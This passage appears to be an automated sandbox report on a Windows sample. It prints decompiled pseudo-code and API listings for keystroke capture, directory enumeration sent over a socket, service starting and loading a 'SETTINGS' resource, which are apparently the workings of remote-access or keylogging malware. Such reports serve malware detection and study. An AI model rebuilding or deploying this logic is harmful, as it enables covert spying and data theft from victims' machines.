                    0x00454c4a
                    0x00454c4c
                    0x00454c4e
                    0x00454c4e
                    0x00454c50
                    0x00454c50
                    0x00454c59
                    0x00454c5a
                    0x00454c5e
                    0x00454c65
                    0x00454c68
                    0x00454c69
                    0x00454c6b
                    0x00454c6b
                    0x00454c6f
                    0x00454c75
                    0x00454c77
                    0x00454c7d
                    0x00454c7f
                    0x00454c85
                    0x00454c88
                    0x00454c9b
                    0x00454c9e
                    0x00454ca4
                    0x00454cb9
                    0x00454cbe
                    0x00454c8a
                    0x00454c8c
                    0x00454c93
                    0x00454c93
                    0x00454c88
                    0x00454cc1
                    0x00454cc1
                    0x00454cd1
                    0x00454cda
                    0x00454cdb
                    0x00454cdd
                    0x00454d74
                    0x00454d76
                    0x00454d81
                    0x00454d81
                    0x00454d83
                    0x00454d86
                    0x00454d88
                    0x00000000
                    0x00454d78
                    0x00454d7e
                    0x00454d7e
                    0x00454ce3
                    0x00454ce3
                    0x00454ce9
                    0x00454cec
                    0x00454cf2
                    0x00454cf5
                    0x00454cfb
                    0x00454cfd
                    0x00454d03
                    0x00454d05
                    0x00454d07
                    0x00454d07
                    0x00454d09
                    0x00454d09
                    0x00454d16
                    0x00454d1d
                    0x00454d20
                    0x00454d21
                    0x00454d23
                    0x00454d24
                    0x00454d24
                    0x00454d28
                    0x00454d2e
                    0x00454d30
                    0x00454d32
                    0x00454d38
                    0x00454d3b
                    0x00454d4f
                    0x00454d55
                    0x00454d6a
                    0x00454d6f
                    0x00454d3d
                    0x00454d3d
                    0x00454d44
                    0x00454d44
                    0x00454d3b
                    0x00454d30
                    0x00454d8e
                    0x00454d8e
                    0x00454d8e
                    0x00454d9a
                    0x00454d9d
                    0x00454da3
                    0x00454da5
                    0x00454da7
                    0x00454dad
                    0x00454daf
                    0x00454daf
                    0x00454daf
                    0x00454dad
                    0x00454db4
                    0x00454db5
                    0x00454db7
                    0x00454db9
                    0x00454db9
                    0x00454dbb
                    0x00454dc1
                    0x00454dc7
                    0x00454dc9
                    0x00454dcf
                    0x00454dcf
                    0x00454dd5
                    0x00454dd7
                    0x00000000
                    0x00000000
                    0x00454ddd
                    0x00454ddf
                    0x00454de1
                    0x00454de1
                    0x00454de3
                    0x00454de3
                    0x00454df3
                    0x00454dfa
                    0x00454dfd
                    0x00454dfe
                    0x00454e00
                    0x00454e00
                    0x00454e04
                    0x00454e0a
                    0x00454e0c
                    0x00454e0e
                    0x00454e14
                    0x00454e17
                    0x00454e28
                    0x00454e2b
                    0x00454e31
                    0x00454e46
                    0x00454e4b
                    0x00454e19
                    0x00454e19
                    0x00454e20
                    0x00454e20
                    0x00454e17
                    0x00454e5c
                    0x00454e6b
                    0x00454e6c
                    0x00454e6c
                    0x00454e6e
                    0x00454e70
                    0x00454e70
                    0x00454e76
                    0x00454e79
                    0x00454e7b
                    0x00454e7d
                    0x00454e7d
                    0x00454e80
                    0x00454e81
                    0x00454e81
                    0x00454e86
                    0x00454e89
                    0x00454e8d
                    0x00454e8d
                    0x00454e8e
                    0x00454e90
                    0x00454e96
                    0x00454e9c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00454e9c
                    0x00454dcf
                    0x00454ea2
                    0x00454ea2
                    0x00000000
                    0x00454ea2
                    0x00453c27
                    0x00453c1e
                    0x00453c15
                    0x00453bcc
                    0x00453bd0
                    0x00453bd8
                    0x00000000
                    0x00453bda
                    0x00453be0
                    0x00453be5
                    0x00454ec1
                    0x00454ec1
                    0x00454ec4
                    0x00454ecf
                    0x00454efa
                    0x00454efb
                    0x00454efc
                    0x00454efd
                    0x00454efe
                    0x00454eff
                    0x00454f04
                    0x00454f07
                    0x00454f0a
                    0x00454f0d
                    0x00454f10
                    0x00454f1f
                    0x00454f21
                    0x00454f47
                    0x00454f4c
                    0x00454f52
                    0x00000000
                    0x00454f23
                    0x00454f23
                    0x00454f29
                    0x00000000
                    0x00454f2b
                    0x00454f3d
                    0x00454f42
                    0x00454f42
                    0x00454f46
                    0x00454f46
                    0x00454f29
                    0x00454f12
                    0x00454f17
                    0x00454f57
                    0x00454f57
                    0x00454f5a
                    0x00454f5a
                    0x00454ed1
                    0x00454ed1
                    0x00454ed1
                    0x00454edb
                    0x00454ee4
                    0x00454ee9
                    0x00454ef7
                    0x00454ef7
                    0x00454ecf
                    0x00453bd8

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 693071d96ab935b72f25f4849bacab489736dbd8414855ac17fb049625a61eae
                    • Instruction ID: f559f62d04daf2fdcfed02d3797ae9b1f690258488dbd9a680428b0d8505f6ab
                    • Opcode Fuzzy Hash: 693071d96ab935b72f25f4849bacab489736dbd8414855ac17fb049625a61eae
                    • Instruction Fuzzy Hash: C0C26E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E0040917A(signed int __ecx, void* __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t101;
                    				intOrPtr* _t106;
                    				signed int _t116;
                    				void* _t128;
                    				void* _t149;
                    				void* _t152;
                    				signed int _t154;
                    				signed int _t167;
                    				signed int _t180;
                    				signed int _t182;
                    				void* _t265;
                    				void* _t267;
                    				void* _t273;
                    				void* _t275;
                    				intOrPtr _t276;
                    				void* _t277;
                    				void* _t280;
                    
                    				_t182 = __ecx;
                    				E00457438(E00457813, _t273);
                    				_t276 = _t275 - 0x300;
                    				_push(_t265);
                    				 *((intOrPtr*)(_t273 - 0x10)) = _t276;
                    				_t180 = _t182;
                    				 *(_t273 - 0x18) = _t180;
                    				E004020DF(_t180, _t273 - 0x9c);
                    				 *(_t273 - 0x1c) =  *(_t273 - 0x1c) | 0xffffffff;
                    				 *_t180 = 0;
                    				 *(_t273 - 4) =  *(_t273 - 4) & 0x00000000;
                    				_t260 = _t180 + 4;
                    				E0040482D(_t180 + 4);
                    				_t101 = E004048C8(_t180 + 4, _t265, _t180 + 4);
                    				_t282 = _t101;
                    				if(_t101 == 0) {
                    					_push(0);
                    					_push(0);
                    					goto L4;
                    				} else {
                    					_t276 = _t276 - 0x18;
                    					_t258 = E00402F31(_t273 - 0x6c, _t273 + 0x38, _t273, 0x473ec8);
                    					E00402F10(_t180, _t276, _t174, _t273, _t282, _t273 + 0x50);
                    					_push(0x64);
                    					_t180 = _t180 & 0xffffff00 | E00404AA1(_t260, _t174, _t282) == 0xffffffff;
                    					E00401FD8();
                    					if(_t180 != 0) {
                    						E00404E26(_t258);
                    						 *((intOrPtr*)(_t273 - 0x20)) = 1;
                    						_push(0x46dd30);
                    						_t152 = _t273 - 0x20;
                    						L3:
                    						_push(_t152);
                    						L4:
                    						E00438B36();
                    					}
                    				}
                    				_t261 = E00402305(_t273 + 0x20, _t273 - 0x30);
                    				_t106 = E004022CA(_t273 + 0x20, _t273 - 0x34);
                    				E00409B02(_t273 - 0x3c,  *((intOrPtr*)(E00402305(_t273 + 0x20, _t273 - 0x38))),  *_t106,  *_t104);
                    				_t277 = _t276 + 0xc;
                    				_t252 = _t273 + 8;
                    				_t267 = FindFirstFileW(E00401F04(E00409082(_t273 - 0x6c, _t273 + 8, _t273, "*")), _t273 - 0x304);
                    				 *(_t273 - 0x1c) = _t267;
                    				E00401F09();
                    				_t285 = _t267 - 0xffffffff;
                    				if(_t267 != 0xffffffff) {
                    					goto L7;
                    				} else {
                    					_t276 = _t277 - 0x18;
                    					E00402093(_t180, _t276, _t252, _t273, 0x465094);
                    					_push(0x65);
                    					E00404AA1( *(_t273 - 0x18) + 4, _t252, _t285);
                    					E00404E26(_t252);
                    					 *((intOrPtr*)(_t273 - 0x24)) = 2;
                    					_push(0x46dd30);
                    					_t152 = _t273 - 0x24;
                    					goto L3;
                    				}
                    				while(1) {
                    					L7:
                    					_t116 = FindNextFileW(_t267, _t273 - 0x304);
                    					__eflags = _t116;
                    					if(_t116 == 0) {
                    						break;
                    					}
                    					_t180 =  *(_t273 - 0x18);
                    					__eflags =  *_t180;
                    					if( *_t180 == 0) {
                    						__eflags =  *(_t273 - 0x304) & 0x00000010;
                    						if(( *(_t273 - 0x304) & 0x00000010) == 0) {
                    							L17:
                    							E0040417E(_t180, _t273 - 0x84, _t252, _t273, _t273 - 0x2d8);
                    							_t261 = E00402305(_t273 - 0x84, _t273 - 0x3c);
                    							_t270 = E004022CA(_t273 - 0x84, _t273 - 0x38);
                    							E00409B02(_t273 - 0x30,  *((intOrPtr*)(E00402305(_t273 - 0x84, _t273 - 0x34))),  *_t134,  *_t132);
                    							_t277 = _t277 + 0xc;
                    							__eflags = E00409985(_t273 - 0x84, _t273 + 0x20, 0) - 0xffffffff;
                    							if(__eflags == 0) {
                    								L20:
                    								E00401F09();
                    								_t267 =  *(_t273 - 0x1c);
                    								continue;
                    							} else {
                    								E00401FE2(_t273 - 0x9c, _t252, _t270, E004020B7(_t180, _t273 - 0x54, _t252, _t273, __eflags, _t273 - 0x304, 0x250));
                    								E00401FD8();
                    								_t277 = _t277 - 0x18;
                    								_t252 = E00402F10(_t180, _t273 - 0x54, E0041B7B3(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x473ec8);
                    								E00402F10(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
                    								_push(0x66);
                    								_t149 = E00404AA1(_t180 + 4, _t147, __eflags);
                    								__eflags = _t149 - 0xffffffff;
                    								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
                    								E00401FD8();
                    								E00401FD8();
                    								__eflags = _t180;
                    								if(_t180 == 0) {
                    									goto L20;
                    								} else {
                    									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
                    									_push(0x46dd30);
                    									_t152 = _t273 - 0x2c;
                    									goto L3;
                    								}
                    							}
                    						} else {
                    							_t154 = E0043F32F(_t273 - 0x2d8, _t273 - 0x2d8, 0x465510);
                    							__eflags = _t154;
                    							if(_t154 == 0) {
                    								goto L17;
                    							} else {
                    								__eflags = E0043F32F(_t273 - 0x2d8, _t273 - 0x2d8, L"..");
                    								if(__eflags == 0) {
                    									goto L17;
                    								} else {
                    									_t252 = E004090E7(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040417E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
                    									E00403014(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");
                    									E00401F09();
                    									E00401F09();
                    									_t280 = _t277 - 0x18;
                    									E00408F83(_t180, _t280, _t159, __eflags, _t273 + 0x20);
                    									_t277 = _t280 - 0x18;
                    									E00408F83(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
                    									_t167 = E0040958C(_t180, _t159, __eflags);
                    									__eflags = _t167;
                    									if(_t167 != 0) {
                    										E00401F09();
                    										goto L17;
                    									} else {
                    										 *((intOrPtr*)(_t273 - 0x28)) = 3;
                    										_push(0x46dd30);
                    										_t152 = _t273 - 0x28;
                    										goto L3;
                    									}
                    								}
                    							}
                    						}
                    						L23:
                    						E00401FD8();
                    						E00401F09();
                    						E00401F09();
                    						E00401FD8();
                    						_t128 = E00401FD8();
                    						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
                    						return _t128;
                    					} else {
                    						FindClose(_t267);
                    					}
                    					L10:
                    					E00404E26(_t252);
                    					goto L23;
                    				}
                    				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
                    				FindClose(_t267);
                    				_t252 = E00402F31(_t273 - 0x54, _t273 + 0x38, _t273, 0x473ec8);
                    				E00402F10(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
                    				_push(0x67);
                    				E00404AA1( *(_t273 - 0x18) + 4, _t119, __eflags);
                    				E00401FD8();
                    				goto L10;
                    			}























                    0x0040917a
                    0x0040917f
                    0x00409184
                    0x0040918b
                    0x0040918d
                    0x00409190
                    0x00409192
                    0x0040919b
                    0x004091a0
                    0x004091a4
                    0x004091a7
                    0x004091ab
                    0x004091b0
                    0x004091b8
                    0x004091bd
                    0x004091bf
                    0x00409527
                    0x00409529
                    0x00000000
                    0x004091c5
                    0x004091c5
                    0x004091df
                    0x004091e3
                    0x004091e9
                    0x004091f5
                    0x004091fb
                    0x00409202
                    0x00409206
                    0x0040920b
                    0x00409212
                    0x00409217
                    0x0040921a
                    0x0040921a
                    0x0040921b
                    0x0040921b
                    0x0040921b
                    0x00409202
                    0x0040922c
                    0x00409235
                    0x00409251
                    0x00409256
                    0x00409265
                    0x0040927f
                    0x00409281
                    0x00409287
                    0x0040928c
                    0x0040928f
                    0x00000000
                    0x00409291
                    0x00409291
                    0x0040929b
                    0x004092a0
                    0x004092a8
                    0x004092b0
                    0x004092b5
                    0x004092bc
                    0x004092c1
                    0x00000000
                    0x004092c1
                    0x004092c9
                    0x004092c9
                    0x004092d1
                    0x004092d7
                    0x004092d9
                    0x00000000
                    0x00000000
                    0x004092df
                    0x004092e2
                    0x004092e5
                    0x004092fb
                    0x00409302
                    0x004093c3
                    0x004093d0
                    0x004093e4
                    0x004093f5
                    0x0040940f
                    0x00409414
                    0x00409428
                    0x0040942b
                    0x004094c8
                    0x004094ce
                    0x004094d3
                    0x00000000
                    0x00409431
                    0x0040944c
                    0x00409454
                    0x00409459
                    0x00409483
                    0x00409487
                    0x0040948d
                    0x00409492
                    0x00409497
                    0x0040949a
                    0x004094a0
                    0x004094ab
                    0x004094b0
                    0x004094b2
                    0x00000000
                    0x004094b4
                    0x004094b4
                    0x004094bb
                    0x004094c0
                    0x00000000
                    0x004094c0
                    0x004094b2
                    0x00409308
                    0x00409314
                    0x0040931b
                    0x0040931d
                    0x00000000
                    0x00409323
                    0x00409336
                    0x00409338
                    0x00000000
                    0x0040933e
                    0x00409362
                    0x00409367
                    0x00409373
                    0x0040937b
                    0x00409380
                    0x00409389
                    0x0040938e
                    0x00409397
                    0x0040939e
                    0x004093a3
                    0x004093a5
                    0x004093be
                    0x00000000
                    0x004093a7
                    0x004093a7
                    0x004093ae
                    0x004093b3
                    0x00000000
                    0x004093b3
                    0x004093a5
                    0x00409338
                    0x0040931d
                    0x0040954e
                    0x00409554
                    0x0040955c
                    0x00409564
                    0x0040956c
                    0x00409574
                    0x0040957c
                    0x00409589
                    0x004092e7
                    0x004092e8
                    0x004092ee
                    0x004092f1
                    0x004092f1
                    0x00000000
                    0x004092f1
                    0x004094db
                    0x004094e0
                    0x00409503
                    0x00409507
                    0x0040950d
                    0x00409512
                    0x0040951a
                    0x00000000

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040917F
                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,007D7AC8,00000010), ref: 004048E0
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040921B
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004092D1
                    • FindClose.KERNEL32(00000000), ref: 004092E8
                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00473EE0,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E38
                      • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E43
                      • Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000,00473EE0,00404AC9), ref: 00404E4C
                    • FindClose.KERNEL32(00000000), ref: 004094E0
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,004045E6,?,?,00000004,?,?,00000004,0040D0AB,00000000,?), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,0040D0AB,00000000,?,?,?,?,?,?,004045E6), ref: 00404B75
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                    • String ID:
                    • API String ID: 1824512719-0
                    • Opcode ID: a404a6eb198181d2f06d58d2712fd27bd0cce0884d5f6809e3256b2ac3dc399c
                    • Instruction ID: 92791cf47f271c949db9aa208a7d7c744c144d8ca31ec5900c28743829c6417f
                    • Opcode Fuzzy Hash: a404a6eb198181d2f06d58d2712fd27bd0cce0884d5f6809e3256b2ac3dc399c
                    • Instruction Fuzzy Hash: A1B18C72900109ABCB14EBA1DD96AEDB379AF44304F50417FF506B61E2EF785E48CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040A307(void* __ecx, intOrPtr _a4) {
                    				long _v8;
                    				void _v38;
                    				short _v40;
                    				char _v296;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				struct HKL__* _t20;
                    				void* _t30;
                    				signed int _t32;
                    				void* _t36;
                    				void* _t37;
                    				void* _t41;
                    
                    				_t30 = __ecx;
                    				E004368A0(_t37,  &_v296, 0, 0x100);
                    				_v40 = 0;
                    				_t32 = 7;
                    				memset( &_v38, 0, _t32 << 2);
                    				asm("stosw");
                    				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                    				GetKeyState(0x10);
                    				GetKeyboardState( &_v296);
                    				ToUnicodeEx( *(_t30 + 0x54),  *(_t30 + 0x58),  &_v296,  &_v40, 0x10, 0, _t20);
                    				E0040417E(_t30, _a4, _t36, _t41,  &_v40);
                    				return _a4;
                    			}
















                    0x0040a31e
                    0x0040a323
                    0x0040a330
                    0x0040a336
                    0x0040a337
                    0x0040a339
                    0x0040a34d
                    0x0040a357
                    0x0040a364
                    0x0040a380
                    0x0040a38d
                    0x0040a39b

                    APIs
                    • GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040A33B
                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A346
                    • GetKeyboardLayout.USER32 ref: 0040A34D
                    • GetKeyState.USER32(00000010), ref: 0040A357
                    • GetKeyboardState.USER32(?), ref: 0040A364
                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A380
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                    • String ID:
                    • API String ID: 3566172867-0
                    • Opcode ID: e795a6e791146f1df5e4387dfc1769cd49d57c4b8a05b91d9d4967a96259a66d
                    • Instruction ID: bccb9d5d13c322bab5d0248ab4586956563a0c37632309591bdf170c5ceccbef
                    • Opcode Fuzzy Hash: e795a6e791146f1df5e4387dfc1769cd49d57c4b8a05b91d9d4967a96259a66d
                    • Instruction Fuzzy Hash: 8C111E7290020CBBDB10DBE4DD49FDA7BBCEF4C715F000469FA04E6191EA75EA548BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A4DF(char _a4) {
                    				signed int _t14;
                    				void* _t17;
                    				void* _t18;
                    
                    				_t14 = 0;
                    				_t18 = OpenSCManagerW(0, 0, 0x10);
                    				_t17 = OpenServiceW(_t18, E00401F04( &_a4), 0x10);
                    				if(_t17 != 0) {
                    					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                    					CloseServiceHandle(_t18);
                    					CloseServiceHandle(_t17);
                    				} else {
                    					CloseServiceHandle(_t18);
                    				}
                    				E00401F09();
                    				return _t14;
                    			}






                    0x0041a4e4
                    0x0041a4f4
                    0x0041a503
                    0x0041a507
                    0x0041a524
                    0x0041a527
                    0x0041a52a
                    0x0041a509
                    0x0041a50a
                    0x0041a50a
                    0x0041a530
                    0x0041a53a

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A135,00000000), ref: 0041A4E8
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A135,00000000), ref: 0041A4FD
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A135,00000000), ref: 0041A50A
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A135,00000000), ref: 0041A515
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A135,00000000), ref: 0041A527
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A135,00000000), ref: 0041A52A
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    • String ID:
                    • API String ID: 276877138-0
                    • Opcode ID: f77c659f7be891b590cd5be6bcd60481181a2464f61273624e41e5987feb4a35
                    • Instruction ID: 080fd6ae35cc1d0ade8bd3917c7b5cba386505715c45472ee2cd936249403c22
                    • Opcode Fuzzy Hash: f77c659f7be891b590cd5be6bcd60481181a2464f61273624e41e5987feb4a35
                    • Instruction Fuzzy Hash: 9FF0E9711012157FD2116B309C89DBF2B6CDF85BA6B01003EF501A21929F78CD4DA97A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041AF3D(void** __ecx) {
                    				struct HRSRC__* _t1;
                    				void* _t3;
                    				long _t4;
                    				void** _t5;
                    				struct HRSRC__* _t7;
                    
                    				_t5 = __ecx;
                    				_t1 = FindResourceA( *0x471d40, "SETTINGS", 0xa);
                    				_t7 = _t1;
                    				if(_t7 != 0) {
                    					_t3 = LockResource(LoadResource( *0x471d40, _t7));
                    					_t4 = SizeofResource( *0x471d40, _t7);
                    					 *_t5 = _t3;
                    					return _t4;
                    				}
                    				return _t1;
                    			}








                    0x0041af4c
                    0x0041af4e
                    0x0041af54
                    0x0041af58
                    0x0041af69
                    0x0041af78
                    0x0041af7e
                    0x00000000
                    0x0041af80
                    0x0041af83

                    APIs
                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041AF4E
                    • LoadResource.KERNEL32(00000000,?,?,0040F1E7,00000000), ref: 0041AF62
                    • LockResource.KERNEL32(00000000,?,?,0040F1E7,00000000), ref: 0041AF69
                    • SizeofResource.KERNEL32(00000000,?,?,0040F1E7,00000000), ref: 0041AF78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    • API String ID: 3473537107-594951305
                    • Opcode ID: bd7e31ffdf64b3c6c2f2b9f83e60ef8ca1fffc6b4bc40ae8e0be8ed1f3bfb0d7
                    • Instruction ID: 1e0d00e3e95ed4ea0abc29411508a08797801e1adcb7ad20faaad61fa96671dd
                    • Opcode Fuzzy Hash: bd7e31ffdf64b3c6c2f2b9f83e60ef8ca1fffc6b4bc40ae8e0be8ed1f3bfb0d7
                    • Instruction Fuzzy Hash: 7FE01A76600B10ABCB311BA5AC4CD473F29F7867A3B100039F905E6631CE368852CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0040958C(intOrPtr __ecx, void* __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t77;
                    				intOrPtr* _t79;
                    				signed int _t89;
                    				signed int _t94;
                    				intOrPtr* _t98;
                    				void* _t115;
                    				signed int _t123;
                    				signed int _t125;
                    				void* _t142;
                    				signed int _t143;
                    				intOrPtr _t146;
                    				char* _t209;
                    				void* _t213;
                    				void* _t217;
                    				void* _t219;
                    				intOrPtr _t220;
                    				void* _t221;
                    				void* _t223;
                    
                    				_t146 = __ecx;
                    				E00457438(E0045781D, _t217);
                    				_t220 = _t219 - 0x308;
                    				_push(_t142);
                    				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
                    				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
                    				E004020DF(_t142, _t217 - 0x5c);
                    				_t77 = E00402305(_t217 + 0x20, _t217 - 0x1c);
                    				_t79 = E004022CA(_t217 + 0x20, _t217 - 0x20);
                    				E00409B02(_t217 - 0x28,  *((intOrPtr*)(E00402305(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
                    				_t221 = _t220 + 0xc;
                    				_t202 = _t217 + 8;
                    				_t213 = FindFirstFileW(E00401F04(E00409082(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
                    				 *(_t217 - 0x1c) = _t213;
                    				E00401F09();
                    				if(_t213 != 0xffffffff) {
                    					_t143 = 0;
                    					__eflags = 0;
                    					while(1) {
                    						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
                    						__eflags = _t89;
                    						if(_t89 == 0) {
                    							break;
                    						}
                    						_t209 =  *((intOrPtr*)(_t217 - 0x18));
                    						__eflags =  *_t209;
                    						if( *_t209 == 0) {
                    							__eflags =  *(_t217 - 0x30c) & 0x00000010;
                    							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
                    								_t123 = E0043F32F(_t217 - 0x2e0, _t217 - 0x2e0, 0x465510);
                    								__eflags = _t123;
                    								if(_t123 != 0) {
                    									_t125 = E0043F32F(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
                    									_pop(_t170);
                    									__eflags = _t125;
                    									if(__eflags != 0) {
                    										_t202 = E004090E7(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040417E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
                    										E00409B2C(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
                    										E00401F09();
                    										E00401F09();
                    										_t223 = _t221 - 0x18;
                    										E00408F83(_t143, _t223, _t128, __eflags, _t217 + 0x20);
                    										_t221 = _t223 - 0x18;
                    										E00408F83(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
                    										E0040958C(_t209, _t202, __eflags);
                    										E00401F09();
                    									}
                    								}
                    							}
                    							E0040417E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
                    							_t98 = E00402305(_t217 - 0x40, _t217 - 0x28);
                    							_t215 = E004022CA(_t217 - 0x40, _t217 - 0x24);
                    							E00409B02(_t217 - 0x44,  *((intOrPtr*)(E00402305(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
                    							_t221 = _t221 + 0xc;
                    							__eflags = E00409985(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
                    							if(__eflags == 0) {
                    								L15:
                    								E00401F09();
                    								_t213 =  *(_t217 - 0x1c);
                    								continue;
                    							} else {
                    								E00401FE2(_t217 - 0x5c, _t202, _t215, E004020B7(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
                    								E00401FD8();
                    								 *(_t217 - 4) = _t143;
                    								_t221 = _t221 - 0x18;
                    								_t202 = E00402F10(_t143, _t217 - 0x74, E0041B7B3(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x473ec8);
                    								E00402F10(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
                    								_push(0x66);
                    								_t115 = E00404AA1( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
                    								__eflags = _t115 - 0xffffffff;
                    								E00401FD8();
                    								E00401FD8();
                    								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
                    								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
                    									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
                    									_t143 = 0;
                    									__eflags = 0;
                    									goto L15;
                    								}
                    								E00401F09();
